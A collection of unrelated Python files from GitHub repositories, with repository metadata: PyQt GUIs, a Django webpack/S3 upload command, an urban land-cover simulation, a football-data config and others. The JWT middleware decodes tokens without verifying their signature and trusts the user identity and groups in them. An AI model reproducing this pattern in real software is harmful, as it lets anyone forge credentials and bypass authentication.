ax_sqp.scatter(x0[sqp_fail], y0[sqp_fail], c='r', marker='x', s=40)
ax_sqp.set_aspect('equal')
ax_sqp.get_xaxis().set_ticks([])
ax_sqp.get_yaxis().set_ticks([])
# ax_sqp.tick_params(axis='x', labelsize=15)
# ax_sqp.tick_params(axis='y', labelsize=15)
ax_alg = fig.add_subplot(1,2,2)
track_obj.plot_map(ax_alg)
alg_succ = np.where(alg_status)[0].astype(int)
alg_fail = np.setdiff1d(np.arange(len(alg_status)), alg_succ).astype(int)
ax_alg.scatter(x0[alg_succ], y0[alg_succ], facecolors='none', edgecolors='g', marker='o', s=40)
ax_alg.scatter(x0[alg_fail], y0[alg_fail], c='r', marker='x', s=40)
ax_alg.set_aspect('equal')
ax_alg.get_xaxis().set_ticks([])
ax_alg.get_yaxis().set_ticks([])
# ax_alg.tick_params(axis='x', labelsize=15)
fig.subplots_adjust(wspace=0.01)
plt.show()
| zhu-edward/DGSQP | scripts/process_data_comp.py | process_data_comp.py | py | 5,070 | python | en | code | 9 | github-code | 36 | [
{
"api_name": "matplotlib.use",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.rcParams",
"line_number": 13,
"usage_type": "attribute"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 13,
"usage_type": "name"
},
{
"api_name": "path... |
36568229403 | from django.core.management.base import BaseCommand
import json
import subprocess
try:
from boto.s3.connection import S3Connection
from boto.s3.key import Key
except:
pass
from django.conf import settings
import mimetypes
import os
def call_subprocess(command):
proc = subprocess.Popen(command,
shell=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
)
def upload_to_s3(css_file):
bucket_name = settings.AWS_BUCKET_NAME
conn = S3Connection(settings.AWS_ACCESS_KEY_ID, settings.AWS_SECRET_ACCESS_KEY)
folder = 'webpack_bundles/'
bucket = conn.get_bucket(bucket_name=bucket_name)
filename = css_file.split('/')[-1]
file_obj = open(css_file, 'r')
content = file_obj.read()
key = folder + filename
bucket = conn.get_bucket(bucket_name=bucket_name)
mime = mimetypes.guess_type(filename)[0]
k = Key(bucket)
k.key = key # folder + filename
k.set_metadata("Content-Type", mime)
k.set_contents_from_string(content)
public_read = True
if public_read:
k.set_acl("public-read")
class Command(BaseCommand):
args = '<filename>'
help = 'Loads the initial data in to database'
def handle(self, *args, **options):
call_subprocess('./node_modules/.bin/webpack --config webpack.config.js')
for each in settings.WEB_PACK_FILES:
directory = settings.BASE_DIR + '/static/webpack_bundles/'
css_file = max([os.path.join(directory, d) for d in os.listdir(directory) if d.startswith(each['webpack_js']) and d.endswith('css')], key=os.path.getmtime)
js_file = max([os.path.join(directory, d) for d in os.listdir(directory) if d.startswith(each['webpack_js']) and d.endswith('js')], key=os.path.getmtime)
if settings.ENABLE_DJANGO_WEBPACK_S3_STORAGES:
upload_to_s3(css_file)
upload_to_s3(js_file)
import re
regex = r'(.*?<link rel="stylesheet" type="text/css" href=")(.*?)(" id="packer_css"/>.*?<script id="packer_js" src=")(.*?)(" type="text/javascript"></script>.*)'
with open(each['html_file_name'], 'r+') as f:
content = f.read()
m = re.match(regex, content, re.DOTALL)
href = settings.STATIC_URL + css_file.split('/static/')[-1]
src = settings.STATIC_URL + js_file.split('/static/')[-1]
content = m.group(1) + href + m.group(3) + src + m.group(5)
with open(each['html_file_name'], 'w') as f:
f.write(content)
result = {'message': "Successfully Created Compressed CSS, JS Files"}
return json.dumps(result)
| MicroPyramid/django-webpacker | django_webpacker/management/commands/compress_css_js_files.py | compress_css_js_files.py | py | 2,758 | python | en | code | 72 | github-code | 36 | [
{
"api_name": "subprocess.Popen",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "subprocess.PIPE",
"line_number": 19,
"usage_type": "attribute"
},
{
"api_name": "subprocess.PIPE",
"line_number": 20,
"usage_type": "attribute"
},
{
"api_name": "django.con... |
41633074479 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""Custom TabBar and TabWidget.
Tabs like ChromeOS for Python3 Qt5 with Extras like UnDock / ReDock Tabs,
Pin / UnPin Tabs, On Mouse Hover Previews for all Tabs except current Tab,
Colored Tabs, Change Position, Change Shape, Fading Transition effect,
Close all Tabs to the Right, Close all Tabs to the Left, Close all other Tabs,
Mouse Hover Tracking, Add Tab Plus Button, Limit Maximum of Tabs, and more.
"""
from PyQt5.QtCore import QEvent, QTimeLine, QTimer
from PyQt5.QtGui import QBrush, QColor, QCursor, QPainter, QRadialGradient
from PyQt5.QtWidgets import (QColorDialog, QDialog, QInputDialog, QLabel,
QMainWindow, QMenu, QMessageBox, QTabBar,
QTabWidget, QToolButton, QVBoxLayout)
##############################################################################
class FaderWidget(QLabel):
"""Custom Placeholder Fading Widget for tabs on TabWidget."""
def __init__(self, parent):
"""Init class."""
super(FaderWidget, self).__init__(parent)
self.timeline, self.opacity, self.old_pic = QTimeLine(), 1.0, None
self.timeline.valueChanged.connect(self.animate)
self.timeline.finished.connect(self.close)
self.timeline.setDuration(750) # 500 ~ 750 Ms is Ok, Not more.
def paintEvent(self, event):
"""Overloaded paintEvent to set opacity and pic."""
painter = QPainter(self)
painter.setOpacity(self.opacity)
if self.old_pic:
painter.drawPixmap(0, 0, self.old_pic)
def animate(self, value):
"""Animation of Opacity."""
self.opacity = 1.0 - value
return self.hide() if self.opacity < 0.1 else self.repaint()
def fade(self, old_pic, old_geometry, move_to):
"""Fade from previous tab to new tab."""
if self.isVisible():
self.close()
if self.timeline.state():
self.timeline.stop()
self.setGeometry(old_geometry)
self.move(1, move_to)
self.old_pic = old_pic
self.timeline.start()
self.show()
class TabBar(QTabBar):
"""Custom tab bar."""
def __init__(self, parent=None, *args, **kwargs):
"""Init class custom tab bar."""
super(TabBar, self).__init__(parent=None, *args, **kwargs)
self.parent, self.limit = parent, self.count() * 2
self.menu, self.submenu = QMenu("Tab Options"), QMenu("Tabs")
self.tab_previews = True
self.menu.addAction("Tab Menu").setDisabled(True)
self.menu.addSeparator()
self.menu.addAction("Set Tab Text", self.set_text)
self.menu.addAction("Set Tab Color", self.set_color)
self.menu.addAction("Set Limits", self.set_limit)
self.menu.addSeparator()
self.menu.addAction("Change Tab Shape", self.set_shape)
self.menu.addAction("Top or Bottom Position", self.set_position)
self.menu.addAction("Pin or Unpin Tab", self.set_pinned)
self.menu.addAction("Undock Tab", self.make_undock)
self.menu.addAction("Toggle Tabs Previews", self.set_tab_previews)
self.menu.addSeparator()
self.menu.addAction("Close this Tab",
lambda: self.removeTab(self.currentIndex()))
self.menu.addAction("Close all Tabs to the Right",
self.close_all_tabs_to_the_right)
self.menu.addAction("Close all Tabs to the Left",
self.close_all_tabs_to_the_left)
self.menu.addAction("Close all other Tabs", self.close_all_other_tabs)
self.menu.addSeparator()
self.menu.addMenu(self.submenu)
self.menu.aboutToShow.connect(self.build_submenu)
self.tabCloseRequested.connect(
lambda: self.removeTab(self.currentIndex()))
self.setMouseTracking(True)
self.installEventFilter(self)
def eventFilter(self, obj, event):
"""Custom Events Filder for detecting clicks on Tabs."""
if obj == self:
if event.type() == QEvent.MouseMove:
index = self.tabAt(event.pos())
self.setCurrentIndex(index)
return True
else:
return QTabBar.eventFilter(self, obj, event) # False
else:
return QMainWindow.eventFilter(self, obj, event)
def mouseDoubleClickEvent(self, event):
"""Handle double click."""
self.menu.exec_(QCursor.pos())
def set_tab_previews(self):
"""Toggle On/Off the Tabs Previews."""
self.tab_previews = not self.tab_previews
return self.tab_previews
def close_all_tabs_to_the_right(self):
"""Close all tabs to the Right."""
for i in range(self.currentIndex() + 1, self.count()):
if self.count() > 2:
self.removeTab(self.count() - 1)
def close_all_tabs_to_the_left(self):
"""Close all tabs to the Left."""
for i in range(self.currentIndex()):
if self.count() > 2:
self.removeTab(0)
def close_all_other_tabs(self):
"""Close all other tabs."""
self.close_all_tabs_to_the_right()
self.close_all_tabs_to_the_left()
def make_undock(self):
"""Undock Tab from TabWidget to a Dialog,if theres more than 2 Tabs."""
msg = "<b>Needs more than 2 Tabs to allow Un-Dock Tabs !."
return self.parent.make_undock() if self.count(
) > 2 else QMessageBox.warning(self, "Error", msg)
def set_shape(self):
"""Handle set Shape on Tabs."""
self.parent.setTabShape(0 if self.parent.tabShape() else 1)
def set_position(self):
"""Handle set Position on Tabs."""
self.parent.setTabPosition(0 if self.parent.tabPosition() else 1)
def set_text(self):
"""Handle set Text on Tabs."""
text = str(QInputDialog.getText(
self, "Tab Options Dialog", "<b>Type Tab Text:",
text=self.tabText(self.currentIndex()))[0]).strip()[:50]
if text:
self.setTabText(self.currentIndex(), text)
def set_color(self):
"""Handle set Colors on Tabs."""
color = QColorDialog.getColor()
if color:
self.setTabTextColor(self.currentIndex(), color)
def set_pinned(self):
"""Handle Pin and Unpin Tabs."""
index = self.currentIndex()
if self.tabText(index) == "":
self.setTabText(index, self.tabToolTip(index))
self.tabButton(index, 1).show()
else:
self.setTabToolTip(index, self.tabText(index))
self.setTabText(index, "")
self.tabButton(index, 1).hide()
def build_submenu(self):
"""Handle build a sub-menu on the fly with the list of tabs."""
self.submenu.clear()
self.submenu.addAction("Tab list").setDisabled(True)
for index in tuple(range(self.count())):
action = self.submenu.addAction("Tab {0}".format(index + 1))
action.triggered.connect(
lambda _, index=index: self.setCurrentIndex(index))
def set_limit(self):
"""Limit the Maximum number of Tabs that can coexist, TBD by Dev."""
limit = int(QInputDialog.getInt(
self, "Tab Options Dialog", "<b>How many Tabs is the Maximum ?:",
self.count() * 2, self.count() * 2, 99)[0])
if limit:
self.limit = limit
return limit
class TabWidget(QTabWidget):
"""Custom tab widget."""
def __init__(self, parent=None, *args, **kwargs):
"""Init class custom tab widget."""
super(TabWidget, self).__init__(parent=None, *args, **kwargs)
self.parent, self.previews, self.timer = parent, [], QTimer(self)
self.fader, self.previous_pic = FaderWidget(self), None
self.timer.setSingleShot(True)
self.timer.timeout.connect(lambda: [_.close() for _ in self.previews])
self.setTabBar(TabBar(self))
self.setMovable(False)
self.setTabsClosable(True)
self.setTabShape(QTabWidget.Triangular)
self.addtab, self.menu_0 = QToolButton(self), QToolButton(self)
self.addtab.setText(" + ")
self.addtab.setToolTip("<b>Add Tabs")
self.menu_0.setText(" ? ")
self.menu_0.setToolTip("<b>Menu")
font = self.addtab.font()
font.setBold(True)
self.addtab.setFont(font)
self.menu_0.setFont(font)
# self.addtab.clicked.connect(self.addTab)
# self.menu_0.clicked.connect(self.show_menu)
self.setCornerWidget(self.addtab, 1)
self.setCornerWidget(self.menu_0, 0)
##############################################################################
if __name__ in '__main__':
from PyQt5.QtWidgets import QApplication, QCalendarWidget
app = QApplication([])
gui = TabWidget()
for i in range(9):
gui.addTab(QLabel("<center><h1 style='color:red'>Tab {0} !".format(i))
if i % 2 else QCalendarWidget(), " Tab {0} ! ".format(i))
gui.show()
exit(app.exec_()) | nrkdrk/BrowserExamplePython | Project/deee.py | deee.py | py | 9,111 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "PyQt5.QtWidgets.QLabel",
"line_number": 26,
"usage_type": "name"
},
{
"api_name": "PyQt5.QtCore.QTimeLine",
"line_number": 33,
"usage_type": "call"
},
{
"api_name": "PyQt5.QtGui.QPainter",
"line_number": 40,
"usage_type": "call"
},
{
"api_name": "Py... |
28508502447 | # Opus/UrbanSim urban simulation software.
# Copyright (C) 2010-2011 University of California, Berkeley, 2005-2009 University of Washington
# See opus_core/LICENSE
import gc
import os
import sys
import shutil
import tempfile
from numpy import arange
from opus_core.variables.attribute_type import AttributeType
from opus_core.store.attribute_cache import AttributeCache
from opus_core.coefficients import Coefficients
from opus_core.storage_factory import StorageFactory
from opus_core.opus_package import OpusPackage
from opus_core.store.attribute_cache import AttributeCache
from opus_core.simulation_state import SimulationState
from opus_core.logger import logger
from opus_core.session_configuration import SessionConfiguration
from urbansim.datasets.gridcell_dataset import GridcellDataset
from biocomplexity.datasets.land_cover_dataset import LandCoverDataset
from biocomplexity.models.land_cover_change_model import LandCoverChangeModel
from biocomplexity.equation_specification import EquationSpecification
from biocomplexity.opus_package_info import package
from biocomplexity.constants import Constants
from biocomplexity.examples.lccm_runner_sample import LccmConfiguration
from biocomplexity.tools.lc_convert_to_flt2 import ConvertToFloat
from biocomplexity.tools.lc_convert2 import LCCMInputConvert
from opus_core.chunk_specification import ChunkSpecification
class Simulation(object):
""" Import data from urbansim cache directory, and compute the following
computed variables: devt, de, commden, house_den, comm_add and house_add.
"""
package_path = OpusPackage().get_path_for_package("biocomplexity")
#lct_attribute = "biocomplexity.land_cover.lct_recoded"
lct_attribute = "lct"
possible_lcts = range(1,15)
def _clean_up_land_cover_cache(self, path):
if os.path.exists(path):
shutil.rmtree(path)
def _get_previous_year(self, current_year, years):
current_year_index = -1
for i in range(len(years)):
if current_year == years[i]:
current_year_index = i
if i <= 0 or i >= len(years):
logger.log_error("invalid year " + str(current_year))
return years[current_year_index-1]
def _generate_input_land_cover(self, current_year, base_directory,
urbansim_cache_directory, years, output_directory,
convert_flt, convert_input):
if current_year == years[0]:
if not convert_input:
return base_directory
else:
package_dir_path = package().get_package_path()
command = os.path.join(package_dir_path, "tools", "lc_convert.py")
status = os.system(command + ' %s -i "%s" -o "%s"' % ('input data', base_directory, self.temp_land_cover_dir))
assert(status == 0, "generate input failed")
return self.temp_land_cover_dir
previous_year = self._get_previous_year(current_year, years)
if not convert_flt:
logger.start_block("Copy data from %s to temp land cover folder" % urbansim_cache_directory)
try:
self._copy_invariants_to_temp_land_cover_dir(os.path.join(urbansim_cache_directory, str(previous_year)))
finally:
logger.end_block()
return self.temp_land_cover_dir
# package_dir_path = package().get_package_path()
# command = os.path.join(package_dir_path, "tools", "lc_convert.py")
flt_directory_in = os.path.join(output_directory, str(previous_year))
flt_directory_out = self.temp_land_cover_dir
LCCMInputConvert()._convert_lccm_input(flt_directory_in, flt_directory_out)
# status = os.system(command + ' %d -i "%s" -o "%s"' % (previous_year, flt_directory_in, flt_directory_out))
# assert(status == 0, "generate input failed")
return self.temp_land_cover_dir
def _get_max_index(self, land_cover_path):
land_covers = LandCoverDataset(in_storage=StorageFactory().get_storage("flt_storage", storage_location=land_cover_path))
return land_covers.size()
def _copy_invariants_to_temp_land_cover_dir(self, land_cover_path):
logger.log_status("temp input land cover data in " + self.temp_land_cover_dir)
land_covers = LandCoverDataset(in_storage=StorageFactory().get_storage("flt_storage", storage_location=land_cover_path),
out_storage=StorageFactory().get_storage("flt_storage", storage_location=self.temp_land_cover_dir),
out_table_name='land_covers', debuglevel=4)
logger.log_status("Land cover dataset created.... ") # added dec 4, 2009
land_covers.flush_dataset() # added dec 4, 2009
land_covers.write_dataset(attributes=AttributeType.PRIMARY)
def _generate_output_flt(self, current_year, urbansim_cache_directory,
output_directory, convert_flt):
if not convert_flt:
return
package_dir_path = package().get_package_path()
command = os.path.join(package_dir_path, "tools", "lc_convert_to_flt.py")
flt_directory_in = os.path.join(urbansim_cache_directory, str(current_year))
flt_directory_out = os.path.join(output_directory, str(current_year))
status = os.system(sys.executable + ' ' + command + ' %d -i "%s" -o "%s"' % (current_year, flt_directory_in, flt_directory_out))
assert(status == 0, "generate output failed")
def _generate_output_flt2(self, current_year, urbansim_cache_directory,
output_directory, convert_flt):
if not convert_flt:
return
flt_directory_in = os.path.join(urbansim_cache_directory, str(current_year))
flt_directory_out = os.path.join(output_directory, str(current_year))
ConvertToFloat()._create_flt_file(current_year, flt_directory_in, flt_directory_out)
def run(self, base_directory, urbansim_cache_directory, years, output_directory, temp_folder,
coefficients_name, specification_name, convert_flt=True, convert_input=False):
""" run the simulation
base_directory: directory contains all years folder of lccm.
urbansim_cache_directory: directory contains all years folder of urbansim cache.
years: lists of year to run."""
model = LandCoverChangeModel(self.possible_lcts, submodel_string=self.lct_attribute,
choice_attribute_name=self.lct_attribute, debuglevel=4)
coefficients = Coefficients()
storage = StorageFactory().get_storage('tab_storage',
storage_location=os.path.join(self.package_path, 'data'))
coefficients.load(in_storage=storage, in_table_name=coefficients_name)
specification = EquationSpecification(in_storage=storage)
specification.load(in_table_name=specification_name)
specification.set_variable_prefix("biocomplexity.land_cover.")
constants = Constants()
simulation_state = SimulationState()
simulation_state.set_cache_directory(urbansim_cache_directory)
attribute_cache = AttributeCache()
SessionConfiguration(new_instance=True,
package_order=['biocomplexity', 'urbansim', 'opus_core'],
in_storage=AttributeCache())
ncols = LccmConfiguration.ncols
if temp_folder is None:
self.temp_land_cover_dir = tempfile.mkdtemp()
else:
self.temp_land_cover_dir = temp_folder
for year in years:
land_cover_path = self._generate_input_land_cover(year, base_directory, urbansim_cache_directory,
years, output_directory, convert_flt, convert_input)
#max_size = 174338406 (orig) - act. int: 19019944 (37632028 incl NoData)
max_size = self._get_max_index(land_cover_path) # 1st instance of lc_dataset - but looks like a 'lite' version
offset = min(LccmConfiguration.offset, max_size)
s = 0
t = offset
while (s < t and t <= max_size):
logger.log_status("Offset: ", s, t)
index = arange(s,t)
land_cover_cache_path=os.path.join(urbansim_cache_directory,str(year),'land_covers')
self._clean_up_land_cover_cache(land_cover_cache_path)
simulation_state.set_current_time(year)
# 2nd instance of lc_dataset
land_covers = LandCoverDataset(in_storage=StorageFactory().get_storage('flt_storage', storage_location=land_cover_path),
out_storage=StorageFactory().get_storage('flt_storage', storage_location=land_cover_path),
debuglevel=4)
land_covers.subset_by_index(index)
# land_covers.load_dataset()
gridcells = GridcellDataset(in_storage=attribute_cache, debuglevel=4)
agents_index = None
model.run(specification, coefficients, land_covers, data_objects={"gridcell":gridcells,
"constants":constants, "flush_variables":True},
chunk_specification = {'nchunks':5}) ## chunk size set here
land_covers.flush_dataset()
del gridcells
del land_covers
# self._generate_output_flt(year, urbansim_cache_directory, output_directory, convert_flt)
self._generate_output_flt2(year, urbansim_cache_directory, output_directory, convert_flt)
if t >= max_size: break
s = max(t-10*ncols,s)
t = min(t+offset-10*ncols,max_size)
# clean up temp storage after done simulation
shutil.rmtree(self.temp_land_cover_dir)
if __name__ == "__main__":
base_dir = r"O:\unix\projects\urbansim9\land_cover_change_model\LCCM_4County_converted/1995"
urbansim_cache = r"D:\urbansim_cache\2006_02_10__13_06"
Simulation().run(base_dir, urbansim_cache, [2005])
| psrc/urbansim | biocomplexity/examples/run_simulation_all_chunks.py | run_simulation_all_chunks.py | py | 10,704 | python | en | code | 4 | github-code | 36 | [
{
"api_name": "opus_core.opus_package.OpusPackage",
"line_number": 41,
"usage_type": "call"
},
{
"api_name": "os.path.exists",
"line_number": 47,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 47,
"usage_type": "attribute"
},
{
"api_name": "shutil... |
37018675284 |
from PyQt5 import uic
from PyQt5.QtWidgets import QApplication
from PyQt5.QtWidgets import QMessageBox
from PyQt5.QtWidgets import QWidget
from PyQt5.QtWidgets import QLabel
from PyQt5.QtWidgets import QProgressBar
from PyQt5.QtWidgets import QFileDialog
from PyQt5.QtWidgets import QSizePolicy
from PyQt5.QtGui import *
from PyQt5.QtCore import Qt
from PyQt5.QtCore import pyqtSignal
import sys
import re
import numpy as np
import MO_Func as mof
class Appmap(QWidget):
sig_log=pyqtSignal(list)
xlist=[]
ylist=[]
zlist=[]
replaced_list=[]
def __init__(self,mainthread):
super().__init__()
self.mainthread=mainthread
self.UILoader()
self.Restyle()
self.SignalSlotBinding()
self.show()
#——————————————————————————————————#
def UILoader(self):
self.ui=uic.loadUi('PI_GUI_App_Map.ui',self)
def Restyle(self):
self.setWindowTitle('Approach Curve-Map')
with open(r'appmap_his.txt','r') as file:
history=file.readlines()
self.lineEdit_xp.setText(history[0])
self.lineEdit_yp.setText(history[1])
self.lineEdit_monitee.setText(history[2])
self.lineEdit_stbr.setText(history[3])
# self.lineEdit_xp.setText('0')
# self.lineEdit_yp.setText('0')
self.combo_zp.addItem('450,350,300,250,200,150,125,100,90,80,70,60,50,45,40,35,30,25,20,15,10,8,6,4,2,0')
self.combo_zp.addItem('0,2,4,6,8,10,15,20,25,30,35,40,45,50,60,70,80,90,100,125,150,200,250,300,350,450')
self.combo_zp.setCurrentText(self.combo_zp.itemText(0))
# self.lineEdit_monitee.setText(r'C:\Users\jy1u18\OneDrive - University of Southampton\PhD\Second Project\Electrochemistry')
# self.lineEdit.setText('dis,dis')
def SignalSlotBinding(self):
self.checkBox.clicked.connect(self.RenameSwitch)
self.proceed.clicked.connect(self.StartExp)
self.toolButton.clicked.connect(self.FileBrowser)
##### GUI Slots
def RenameSwitch(self):
if self.checkBox.isChecked():
self.label_3.setEnabled(True)
self.lineEdit_stbr.setEnabled(True)
else:
self.label_3.setEnabled(False)
self.lineEdit_stbr.setEnabled(False)
def StartExp(self):
permission=False
self.SaveRecord()
permission=self.StatusCheck()
if permission==True:
self.ExpMonitor()
if self.checkBox.isChecked():
self.RenameMonitor()
def SaveRecord(self):
file=open(r'appmap_his.txt','w')
file.close()
with open(r'appmap_his.txt','a') as file:
for widget in [self.lineEdit_xp, self.lineEdit_yp,self.lineEdit_monitee,self.lineEdit_stbr]:
text=widget.text()
file.write(text)
def StatusCheck(self):
try:
self.mainthread.ServoCheck()
self.list_read(widget=self.lineEdit_xp,tlist=self.xlist,ty=int)
self.list_read(widget=self.lineEdit_yp,tlist=self.ylist,ty=int)
self.list_read(widget=self.combo_zp,tlist=self.zlist,ty=int)
self.num3d=len(self.xlist)*len(self.ylist)*len(self.zlist)
self.num2d=len(self.xlist)*len(self.ylist)
self.filename=self.lineEdit_monitee.text().rstrip()
print(self.filename)
self.list_read(widget=self.lineEdit_stbr,tlist=self.replaced_list,ty=str)
self.count_file=self.filename+r'\count.txt'
return True
except Exception as arg_err:
if arg_err==FileNotFoundError:
self.mainthread.LogWriter('Create a count.txt file in the target directory first.')
self.mainthread.LogWriter(arg_err)
elif arg_err==ValueError('qSVO of a device returned False'):
self.mainthread.LogWriter('Turn on servo of each axis first.')
self.mainthread.LogWriter(arg_err)
else:
self.mainthread.LogWriter('Unknown Error.')
self.mainthread.LogWriter(arg_err)
def ExpMonitor(self):
self.ProgressBar()
self.mon_thrd=mof.ExpMonitor(self.mainthread,self.xlist,self.ylist,self.zlist,self.num3d,self.count_file)
self.mainthread.threadlist.append(self.mon_thrd)
self.mon_thrd.sig_ascent.connect(self.Signal_Ascent)
self.mon_thrd.sig_complete.connect(self.ExpComplete)
self.mon_thrd.sig_progressbar.connect(self.progressbar.setValue)
# self.mon_thrd.sig_error.connect(lambda: self.msgrunning.cancel())
self.mon_thrd.start()
self.proceed.setEnabled(False)
def RenameMonitor(self):
self.rename_thrd=mof.RenameMonitor(self.mainthread,self.filename,self.replaced_list,self.zlist)
self.mainthread.threadlist.append(self.rename_thrd)
self.rename_thrd.start()
def FileBrowser(self):
path=self.lineEdit_monitee.text()
self.filename=QFileDialog.getExistingDirectory(None,'Monitor Folder',path)
if self.filename=='':
pass
else:
self.lineEdit_monitee.setText(self.filename)
##### Monitor Thread Slots
def ThreadError(self,string):
self.thread_error=QMessageBox()
self.thread_error.setIcon(QMessageBox.Warning)
self.thread_error.setText(string)
self.thread_error.setStandardButtons(QMessageBox.Ok)
self.thread_error.setWindowTitle('Error')
self.thread_error.show()
def Signal_Ascent(self,paraset):
index=paraset[0]
step=paraset[1]
if paraset[1]==0:
vel=0.001
elif paraset[1]>0.1:
vel=float(format(np.abs(paraset[1]/2),'.4f'))
else:
vel=float(format(np.abs(paraset[1]),'.4f'))
self.mainthread.MoveTo(index,step,vel)
def ExpComplete(self):
self.mainthread.LogWriter('Experiments done!')
try:
self.mon_thrd.terminate()
self.rename_thrd.terminate()
except Exception as arg_err:
self.mainthread.LogWriter('Thread Terminating Error: ')
self.mainthread.LogWriter(arg_err)
self.proceed.setEnabled(True)
self.progressbar.deleteLater()
self.progresslabel.deleteLater()
QApplication.processEvents()
def ProgressBar(self):
self.progressbar=QProgressBar()
self.progressbar.setValue(0)
self.progressbar.setAlignment(Qt.AlignCenter)
self.progresslabel=QLabel()
self.progresslabel.setText(
'Approach Curve experiments running. Do not close this window while running! '
)
self.progresslabel.setAlignment(Qt.AlignCenter)
sizePolicy=QSizePolicy(QSizePolicy.Preferred, QSizePolicy.Expanding)
self.progresslabel.setSizePolicy(sizePolicy)
self.verticalLayout.addWidget(self.progressbar)
self.verticalLayout.addWidget(self.progresslabel)
##### Auxilary Function
def list_read(self,widget,tlist,ty=int):
try:
try:
string=widget.text()
except Exception:
string=widget.currentText()
res=[]
element=string.split(",")
sets=[]
num=[]
for ele in element:
if '(' in ele:
sets.append(ele)
else:
num.append(ty(ele))
res+=list(map(ty, num))
for i in sets:
numset=re.findall(r'[(](.*?)[)]', i)
rangepara=numset[0].split(' ')
rangepara=list(map(ty, rangepara))
res+=np.arange(rangepara[0],rangepara[1]+1,rangepara[2]).tolist()
tlist[:]=res
except Exception as arg_err:
self.mainthread.LogWriter('Input parameter error:')
self.mainthread.LogWriter(arg_err)
self.reading_error=QMessageBox()
self.reading_error.setIcon(QMessageBox.Critical)
self.reading_error.setText('Potentially input error, please check your inputs\n See log widget for more infomation.')
self.reading_error.setStandardButtons(QMessageBox.Ok)
self.reading_error.setWindowTitle('Error')
self.reading_error.show()
return res
def closeEvent(self,event):
try:
self.mon_thrd.terminate()
self.rename_thrd.terminate()
self.mainthread.LogWriter('Thread terminated.')
except Exception as arg_err:
if type(arg_err)!=AttributeError:
self.mainthread.LogWriter(arg_err)
if __name__=='__main__':
app = QApplication(sys.argv)
win=QWidget()
ui=Appmap(win)
sys.exit(app.exec_()) | sylvanace/MicroOuija | MO_AppMap.py | MO_AppMap.py | py | 9,072 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "PyQt5.QtWidgets.QWidget",
"line_number": 19,
"usage_type": "name"
},
{
"api_name": "PyQt5.QtCore.pyqtSignal",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "PyQt5.uic.loadUi",
"line_number": 34,
"usage_type": "call"
},
{
"api_name": "PyQt... |
70721629544 | from datetime import datetime
import os
class Config:
FOOTBALL_DATA_URL = "https://www.football-data.co.uk"
FOOTBALL_DATA_TABLE = "mmz4281"
# Azure access
AZURE_CONNECTION_STRING = os.environ["AZURE_CONNECTION_STRING"]
AZURE_CONTAINER_NAME = os.environ["AZURE_CONTAINER_NAME"]
AZURE_RESULTS_TABLE = "results"
AZURE_FIXTURES_TABLE = "fixtures"
AZURE_PROCESSED_TABLE = "processed"
AZURE_PREDICTIONS_TABLE = "predictions"
AZURE_MODELS_FOLDER = "models"
# fpath
PREDICTED_FPATH = "static/predicted.txt"
# starting year for each league
LEAGUES = {"E0": 5,
"D1": 6,
"I1": 5,
"SP1": 5,
"F1": 5,
"E1": 5,
"P1": 17,
"N1": 17,
"T1": 17,
"B1": 17}
# First and last season (starting year).
# For current year, get current year and subtract 1 if current month is June or lower.
# So long as something like covid does not happen again, this assumption should hold.
FIRST_SEASON = 5
CURRENT_SEASON = (datetime.now().year - 2000) - (datetime.now().month <= 6)
# column mapping
TARGET_COL = "F_H_DIFF"
COL_MAPPING = {"Div": "F_DIV",
"Date": "F_DATE",
"Time": "F_TIME",
"HomeTeam": "F_H_TEAM",
"AwayTeam": "F_A_TEAM",
"FTHG": "F_H_GOALS",
"FTAG": "F_A_GOALS",
"FTR": "F_RESULT",
"HS": "F_H_SHOTS",
"AS": "F_A_SHOTS",
"HST": "F_H_TSHOTS",
"AST": "F_A_TSHOTS",
"HF": "F_H_FOULS",
"AF": "F_A_FOULS",
"HC": "F_H_CORNERS",
"AC": "F_A_CORNERS",
"HY": "F_H_YELLOWS",
"AY": "F_A_YELLOWS",
"HR": "F_H_REDS",
"AR": "F_A_REDS",
"BbMxH": "ODDS_H_MAX",
"BbMxD": "ODDS_D_MAX",
"BbMxA": "ODDS_A_MAX",
"MaxH": "ODDS_H_MAX",
"MaxD": "ODDS_D_MAX",
"MaxA": "ODDS_A_MAX",
"BbAvH": "ODDS_H_AVG",
"BbAvD": "ODDS_D_AVG",
"BbAvA": "ODDS_A_AVG",
"AvgH": "ODDS_H_AVG",
"AvgD": "ODDS_D_AVG",
"AvgA": "ODDS_A_AVG"}
PRED_MAPPING = {1.0: "H",
0.0: "D",
-1.0: "A"}
| dimasikson/football-prediction-web-app | src/utils/config.py | config.py | py | 2,578 | python | en | code | 2 | github-code | 36 | [
{
"api_name": "os.environ",
"line_number": 9,
"usage_type": "attribute"
},
{
"api_name": "os.environ",
"line_number": 10,
"usage_type": "attribute"
},
{
"api_name": "datetime.datetime.now",
"line_number": 36,
"usage_type": "call"
},
{
"api_name": "datetime.datetim... |
70677607784 | import jwt
class User:
id = None
email = None
groups = []
company = None
class RequestJwtMiddleware:
def __init__(self, get_response):
self.get_response = get_response
def get_token_payload(self, request):
payload = {}
authorization = request.META.get("HTTP_AUTHORIZATION", "")
try:
token = authorization.split("Bearer ")[1]
except IndexError:
return {}
payload = jwt.decode(token, verify=False)
return payload
def __call__(self, request):
payload = self.get_token_payload(request)
request.user_object = User
if payload:
request.user_object.id = payload["sub"]
request.user_object.email = payload["email"]
request.user_object.groups = [g for g in payload["scope"].split(" ")]
request.user_object.company = payload["clt-ref"]
response = self.get_response(request)
return response | damienLopa/ms_drf_utils | ms_drf_utils/middlewares.py | middlewares.py | py | 986 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "jwt.decode",
"line_number": 24,
"usage_type": "call"
}
] |
11002983130 | #! /usr/bin/env python3.
from os import path
from pydub import AudioSegment
from custom_filesystem import CustomFilesystem, WAV_EXTENSION
import speech_accent_archive_analysis
# Create a wav duplicate (in the same directory) for an mp3 recording.
def create_wav_duplicate(mp3_recording_path):
path_without_extension = mp3_recording_path[:-4]
wav_recording_path = path_without_extension + WAV_EXTENSION
sound = AudioSegment.from_mp3(mp3_recording_path)
sound.export(wav_recording_path, format="wav")
if __name__ == '__main__':
